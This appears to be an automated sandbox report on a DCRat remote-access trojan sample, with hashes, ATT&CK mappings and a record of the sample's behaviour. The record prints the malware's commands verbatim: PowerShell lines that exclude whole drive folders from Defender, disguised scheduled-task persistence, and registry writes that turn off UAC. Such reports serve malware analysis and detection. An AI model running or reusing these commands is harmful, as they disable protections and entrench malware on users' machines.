dcrat | 350154b0e3a6b19a71850f3aa2c6ae51e416332e904b4bdd219617a9e0d167e2

Analysis

max time kernel
17s
max time network
51s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
14-10-2022 16:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

117c359132faf42213eaac64727f05db.exe
Size

4.9MB
MD5

117c359132faf42213eaac64727f05db
SHA1

e9833abb1fdff71b1e521b65300e8a4b3931d662
SHA256

350154b0e3a6b19a71850f3aa2c6ae51e416332e904b4bdd219617a9e0d167e2
SHA512

81e22905790200420632c41fc1b666d5d4c50ef58863ccf477f75c711f19c02549b2011cc2d6a7f51dacdd1c77da68b44250bcb59f39e9b8607ec6823c45ca19
SSDEEP

49152:bl5MTGChZpxtlBBgxchXb/zqP6DUtRgs5q289dAnSz44hnW1XgnYu6fYmPkMSx8E:

Score

10^/10

dcrat evasion infostealer rat trojan

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1824	472	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1048	472	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	924	472	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1168	472	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	772	472	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1012	472	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1684	472	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1912	472	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1320	472	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1716	472	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1728	472	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	368	472	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	552	472	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1560	472	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	608	472	schtasks.exe

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

117c359132faf42213eaac64727f05db.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	117c359132faf42213eaac64727f05db.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	117c359132faf42213eaac64727f05db.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	117c359132faf42213eaac64727f05db.exe

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral1/memory/1340-55-0x000000001B6C0000-0x000000001B7EE000-memory.dmp	dcrat

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

117c359132faf42213eaac64727f05db.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	117c359132faf42213eaac64727f05db.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	117c359132faf42213eaac64727f05db.exe

Drops file in Program Files directory 4 IoCs

Processes:

117c359132faf42213eaac64727f05db.exe

description	ioc	process
File created	C:\Program Files\Windows Media Player\Network Sharing\services.exe	117c359132faf42213eaac64727f05db.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\c5b4cb5e9653cc	117c359132faf42213eaac64727f05db.exe
File opened for modification	C:\Program Files\Windows Media Player\Network Sharing\RCX4945.tmp	117c359132faf42213eaac64727f05db.exe
File opened for modification	C:\Program Files\Windows Media Player\Network Sharing\services.exe	117c359132faf42213eaac64727f05db.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1168	schtasks.exe
772	schtasks.exe
1012	schtasks.exe
1912	schtasks.exe
924	schtasks.exe
1320	schtasks.exe
1716	schtasks.exe
1824	schtasks.exe
1048	schtasks.exe
1684	schtasks.exe
1728	schtasks.exe
608	schtasks.exe
368	schtasks.exe
552	schtasks.exe
1560	schtasks.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

117c359132faf42213eaac64727f05db.exe

pid process

1340 117c359132faf42213eaac64727f05db.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

117c359132faf42213eaac64727f05db.exe

description pid process

Token: SeDebugPrivilege 1340 117c359132faf42213eaac64727f05db.exe

pid	process
1340	117c359132faf42213eaac64727f05db.exe

description	pid	process
Token: SeDebugPrivilege	1340	117c359132faf42213eaac64727f05db.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

117c359132faf42213eaac64727f05db.exe

description	pid	process	target process
PID 1340 wrote to memory of 948	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 948	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 948	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 984	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 984	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 984	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1736	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1736	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1736	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1712	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1712	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1712	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 532	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 532	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 532	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1316	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1316	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1316	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1472	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1472	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1472	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 812	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 812	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 812	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1216	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1216	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1216	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 860	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 860	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 860	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1048	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1048	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1048	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1076	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1076	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe
PID 1340 wrote to memory of 1076	1340	117c359132faf42213eaac64727f05db.exe	powershell.exe

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

Processes:

117c359132faf42213eaac64727f05db.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	117c359132faf42213eaac64727f05db.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	117c359132faf42213eaac64727f05db.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	117c359132faf42213eaac64727f05db.exe

C:\Users\Admin\AppData\Local\Temp\117c359132faf42213eaac64727f05db.exe
"C:\Users\Admin\AppData\Local\Temp\117c359132faf42213eaac64727f05db.exe"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
2⤵
PID:948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
2⤵
PID:984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
2⤵
PID:1736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
2⤵
PID:1712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
2⤵
PID:532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
2⤵
PID:1316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
2⤵
PID:1472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
2⤵
PID:812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
2⤵
PID:1216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
2⤵
PID:860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
2⤵
PID:1048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
2⤵
PID:1076

C:\Users\Admin\AppData\Local\Temp\117c359132faf42213eaac64727f05db.exe
"C:\Users\Admin\AppData\Local\Temp\117c359132faf42213eaac64727f05db.exe"
2⤵
PID:2068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1048

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "117c359132faf42213eaac64727f05db1" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Microsoft\117c359132faf42213eaac64727f05db.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1168

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "117c359132faf42213eaac64727f05db" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\117c359132faf42213eaac64727f05db.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "117c359132faf42213eaac64727f05db1" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Microsoft\117c359132faf42213eaac64727f05db.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Media Player\Network Sharing\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Network Sharing\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Media Player\Network Sharing\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1320

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\My Documents\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Admin\My Documents\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1728

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\My Documents\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 9 /tr "'C:\Recovery\31001cc2-2a3d-11ed-9244-9c23e66b04e4\taskhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 7 /tr "'C:\Recovery\31001cc2-2a3d-11ed-9244-9c23e66b04e4\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1560

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Recovery\31001cc2-2a3d-11ed-9244-9c23e66b04e4\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:608

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\117c359132faf42213eaac64727f05db.exe
Filesize
4.9MB

MD5
117c359132faf42213eaac64727f05db

SHA1
e9833abb1fdff71b1e521b65300e8a4b3931d662

SHA256
350154b0e3a6b19a71850f3aa2c6ae51e416332e904b4bdd219617a9e0d167e2

SHA512
81e22905790200420632c41fc1b666d5d4c50ef58863ccf477f75c711f19c02549b2011cc2d6a7f51dacdd1c77da68b44250bcb59f39e9b8607ec6823c45ca19

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
91effc1fc34f7328f25d5d0e466661a1

SHA1
49d30d83376cadf530d12401b1f0890ccbba465f

SHA256
87f3aaf62314e70061f7f7f46f0890f308febb7cfa65d1d03025789d00f91a01

SHA512
99ae34eb75cab9b0ba20014d3b0bc5b8b7b6ba4e5f91cf12efb9bcdf709932223ad3f2d584e51b63502e91dc61dc42ce06905491c1f73984e244887cedcafb61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
91effc1fc34f7328f25d5d0e466661a1

SHA1
49d30d83376cadf530d12401b1f0890ccbba465f

SHA256
87f3aaf62314e70061f7f7f46f0890f308febb7cfa65d1d03025789d00f91a01

SHA512
99ae34eb75cab9b0ba20014d3b0bc5b8b7b6ba4e5f91cf12efb9bcdf709932223ad3f2d584e51b63502e91dc61dc42ce06905491c1f73984e244887cedcafb61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
91effc1fc34f7328f25d5d0e466661a1

SHA1
49d30d83376cadf530d12401b1f0890ccbba465f

SHA256
87f3aaf62314e70061f7f7f46f0890f308febb7cfa65d1d03025789d00f91a01

SHA512
99ae34eb75cab9b0ba20014d3b0bc5b8b7b6ba4e5f91cf12efb9bcdf709932223ad3f2d584e51b63502e91dc61dc42ce06905491c1f73984e244887cedcafb61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
91effc1fc34f7328f25d5d0e466661a1

SHA1
49d30d83376cadf530d12401b1f0890ccbba465f

SHA256
87f3aaf62314e70061f7f7f46f0890f308febb7cfa65d1d03025789d00f91a01

SHA512
99ae34eb75cab9b0ba20014d3b0bc5b8b7b6ba4e5f91cf12efb9bcdf709932223ad3f2d584e51b63502e91dc61dc42ce06905491c1f73984e244887cedcafb61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
91effc1fc34f7328f25d5d0e466661a1

SHA1
49d30d83376cadf530d12401b1f0890ccbba465f

SHA256
87f3aaf62314e70061f7f7f46f0890f308febb7cfa65d1d03025789d00f91a01

SHA512
99ae34eb75cab9b0ba20014d3b0bc5b8b7b6ba4e5f91cf12efb9bcdf709932223ad3f2d584e51b63502e91dc61dc42ce06905491c1f73984e244887cedcafb61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
91effc1fc34f7328f25d5d0e466661a1

SHA1
49d30d83376cadf530d12401b1f0890ccbba465f

SHA256
87f3aaf62314e70061f7f7f46f0890f308febb7cfa65d1d03025789d00f91a01

SHA512
99ae34eb75cab9b0ba20014d3b0bc5b8b7b6ba4e5f91cf12efb9bcdf709932223ad3f2d584e51b63502e91dc61dc42ce06905491c1f73984e244887cedcafb61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
91effc1fc34f7328f25d5d0e466661a1

SHA1
49d30d83376cadf530d12401b1f0890ccbba465f

SHA256
87f3aaf62314e70061f7f7f46f0890f308febb7cfa65d1d03025789d00f91a01

SHA512
99ae34eb75cab9b0ba20014d3b0bc5b8b7b6ba4e5f91cf12efb9bcdf709932223ad3f2d584e51b63502e91dc61dc42ce06905491c1f73984e244887cedcafb61

Download Submit
memory/532-116-0x0000000002874000-0x0000000002877000-memory.dmp

Filesize
12KB

Download
memory/532-144-0x000000001B790000-0x000000001BA8F000-memory.dmp

Filesize
3.0MB

Download
memory/532-132-0x0000000002874000-0x0000000002877000-memory.dmp

Filesize
12KB

Download
memory/532-104-0x000007FEEAC50000-0x000007FEEB673000-memory.dmp

Filesize
10.1MB

Download
memory/532-73-0x0000000000000000-mapping.dmp

Download
memory/532-164-0x0000000002874000-0x0000000002877000-memory.dmp

Filesize
12KB

Download
memory/532-125-0x000007FEF5710000-0x000007FEF626D000-memory.dmp

Filesize
11.4MB

Download
memory/532-165-0x000000000287B000-0x000000000289A000-memory.dmp

Filesize
124KB

Download
memory/812-76-0x0000000000000000-mapping.dmp

Download
memory/860-108-0x000007FEEAC50000-0x000007FEEB673000-memory.dmp

Filesize
10.1MB

Download
memory/860-80-0x0000000000000000-mapping.dmp

Download
memory/860-110-0x000007FEF5710000-0x000007FEF626D000-memory.dmp

Filesize
11.4MB

Download
memory/860-128-0x0000000002294000-0x0000000002297000-memory.dmp

Filesize
12KB

Download
memory/860-134-0x000000001B710000-0x000000001BA0F000-memory.dmp

Filesize
3.0MB

Download
memory/860-112-0x0000000002294000-0x0000000002297000-memory.dmp

Filesize
12KB

Download
memory/860-147-0x000000000229B000-0x00000000022BA000-memory.dmp

Filesize
124KB

Download
memory/860-146-0x0000000002294000-0x0000000002297000-memory.dmp

Filesize
12KB

Download
memory/948-77-0x000007FEFB9E1000-0x000007FEFB9E3000-memory.dmp

Filesize
8KB

Download
memory/948-155-0x0000000002474000-0x0000000002477000-memory.dmp

Filesize
12KB

Download
memory/948-135-0x000000001B840000-0x000000001BB3F000-memory.dmp

Filesize
3.0MB

Download
memory/948-133-0x0000000002474000-0x0000000002477000-memory.dmp

Filesize
12KB

Download
memory/948-154-0x000000000247B000-0x000000000249A000-memory.dmp

Filesize
124KB

Download
memory/948-122-0x000007FEF5710000-0x000007FEF626D000-memory.dmp

Filesize
11.4MB

Download
memory/948-69-0x0000000000000000-mapping.dmp

Download
memory/948-91-0x000007FEEAC50000-0x000007FEEB673000-memory.dmp

Filesize
10.1MB

Download
memory/948-117-0x0000000002474000-0x0000000002477000-memory.dmp

Filesize
12KB

Download
memory/984-92-0x000007FEEAC50000-0x000007FEEB673000-memory.dmp

Filesize
10.1MB

Download
memory/984-159-0x0000000002564000-0x0000000002567000-memory.dmp

Filesize
12KB

Download
memory/984-138-0x0000000002564000-0x0000000002567000-memory.dmp

Filesize
12KB

Download
memory/984-70-0x0000000000000000-mapping.dmp

Download
memory/984-142-0x000000001B7A0000-0x000000001BA9F000-memory.dmp

Filesize
3.0MB

Download
memory/984-123-0x000007FEF5710000-0x000007FEF626D000-memory.dmp

Filesize
11.4MB

Download
memory/984-120-0x0000000002564000-0x0000000002567000-memory.dmp

Filesize
12KB

Download
memory/984-158-0x000000000256B000-0x000000000258A000-memory.dmp

Filesize
124KB

Download
memory/1048-148-0x000000000238B000-0x00000000023AA000-memory.dmp

Filesize
124KB

Download
memory/1048-151-0x000000000238B000-0x00000000023AA000-memory.dmp

Filesize
124KB

Download
memory/1048-140-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

Filesize
3.0MB

Download
memory/1048-113-0x0000000002384000-0x0000000002387000-memory.dmp

Filesize
12KB

Download
memory/1048-106-0x000007FEEAC50000-0x000007FEEB673000-memory.dmp

Filesize
10.1MB

Download
memory/1048-129-0x0000000002384000-0x0000000002387000-memory.dmp

Filesize
12KB

Download
memory/1048-81-0x0000000000000000-mapping.dmp

Download
memory/1048-150-0x0000000002384000-0x0000000002387000-memory.dmp

Filesize
12KB

Download
memory/1048-111-0x000007FEF5710000-0x000007FEF626D000-memory.dmp

Filesize
11.4MB

Download
memory/1076-162-0x000000000259B000-0x00000000025BA000-memory.dmp

Filesize
124KB

Download
memory/1076-124-0x000007FEF5710000-0x000007FEF626D000-memory.dmp

Filesize
11.4MB

Download
memory/1076-114-0x0000000002594000-0x0000000002597000-memory.dmp

Filesize
12KB

Download
memory/1076-141-0x000000001B910000-0x000000001BC0F000-memory.dmp

Filesize
3.0MB

Download
memory/1076-88-0x0000000000000000-mapping.dmp

Download
memory/1076-160-0x0000000002594000-0x0000000002597000-memory.dmp

Filesize
12KB

Download
memory/1076-130-0x0000000002594000-0x0000000002597000-memory.dmp

Filesize
12KB

Download
memory/1076-103-0x000007FEEAC50000-0x000007FEEB673000-memory.dmp

Filesize
10.1MB

Download
memory/1216-107-0x000007FEEAC50000-0x000007FEEB673000-memory.dmp

Filesize
10.1MB

Download
memory/1216-163-0x000000000262B000-0x000000000264A000-memory.dmp

Filesize
124KB

Download
memory/1216-139-0x000000001B7E0000-0x000000001BADF000-memory.dmp

Filesize
3.0MB

Download
memory/1216-78-0x0000000000000000-mapping.dmp

Download
memory/1216-119-0x0000000002624000-0x0000000002627000-memory.dmp

Filesize
12KB

Download
memory/1216-137-0x0000000002624000-0x0000000002627000-memory.dmp

Filesize
12KB

Download
memory/1216-161-0x0000000002624000-0x0000000002627000-memory.dmp

Filesize
12KB

Download
memory/1216-121-0x000007FEF5710000-0x000007FEF626D000-memory.dmp

Filesize
11.4MB

Download
memory/1316-152-0x0000000002684000-0x0000000002687000-memory.dmp

Filesize
12KB

Download
memory/1316-153-0x000000000268B000-0x00000000026AA000-memory.dmp

Filesize
124KB

Download
memory/1316-74-0x0000000000000000-mapping.dmp

Download
memory/1316-136-0x0000000002684000-0x0000000002687000-memory.dmp

Filesize
12KB

Download
memory/1316-118-0x0000000002684000-0x0000000002687000-memory.dmp

Filesize
12KB

Download
memory/1316-109-0x000007FEEAC50000-0x000007FEEB673000-memory.dmp

Filesize
10.1MB

Download
memory/1316-126-0x000007FEF5710000-0x000007FEF626D000-memory.dmp

Filesize
11.4MB

Download
memory/1316-149-0x000000000268B000-0x00000000026AA000-memory.dmp

Filesize
124KB

Download
memory/1316-145-0x000000001B7F0000-0x000000001BAEF000-memory.dmp

Filesize
3.0MB

Download
memory/1340-60-0x0000000000340000-0x0000000000350000-memory.dmp

Filesize
64KB

Download
memory/1340-62-0x00000000009A0000-0x00000000009B2000-memory.dmp

Filesize
72KB

Download
memory/1340-57-0x0000000000320000-0x0000000000328000-memory.dmp

Filesize
32KB

Download
memory/1340-58-0x0000000000330000-0x0000000000340000-memory.dmp

Filesize
64KB

Download
memory/1340-55-0x000000001B6C0000-0x000000001B7EE000-memory.dmp

Filesize
1.2MB

Download
memory/1340-68-0x0000000000A00000-0x0000000000A0C000-memory.dmp

Filesize
48KB

Download
memory/1340-56-0x0000000000280000-0x000000000029C000-memory.dmp

Filesize
112KB

Download
memory/1340-65-0x00000000009D0000-0x00000000009DE000-memory.dmp

Filesize
56KB

Download
memory/1340-59-0x00000000005D0000-0x00000000005E6000-memory.dmp

Filesize
88KB

Download
memory/1340-67-0x00000000009F0000-0x00000000009F8000-memory.dmp

Filesize
32KB

Download
memory/1340-66-0x00000000009E0000-0x00000000009E8000-memory.dmp

Filesize
32KB

Download
memory/1340-54-0x00000000013E0000-0x00000000018D4000-memory.dmp

Filesize
5.0MB

Download
memory/1340-63-0x00000000009B0000-0x00000000009BA000-memory.dmp

Filesize
40KB

Download
memory/1340-61-0x0000000000990000-0x000000000099A000-memory.dmp

Filesize
40KB

Download
memory/1340-64-0x00000000009C0000-0x00000000009CE000-memory.dmp

Filesize
56KB

Download
memory/1472-75-0x0000000000000000-mapping.dmp

Download
memory/1712-127-0x000007FEF5710000-0x000007FEF626D000-memory.dmp

Filesize
11.4MB

Download
memory/1712-157-0x00000000028EB000-0x000000000290A000-memory.dmp

Filesize
124KB

Download
memory/1712-156-0x00000000028E4000-0x00000000028E7000-memory.dmp

Filesize
12KB

Download
memory/1712-105-0x000007FEEAC50000-0x000007FEEB673000-memory.dmp

Filesize
10.1MB

Download
memory/1712-115-0x00000000028E4000-0x00000000028E7000-memory.dmp

Filesize
12KB

Download
memory/1712-72-0x0000000000000000-mapping.dmp

Download
memory/1712-143-0x000000001B7C0000-0x000000001BABF000-memory.dmp

Filesize
3.0MB

Download
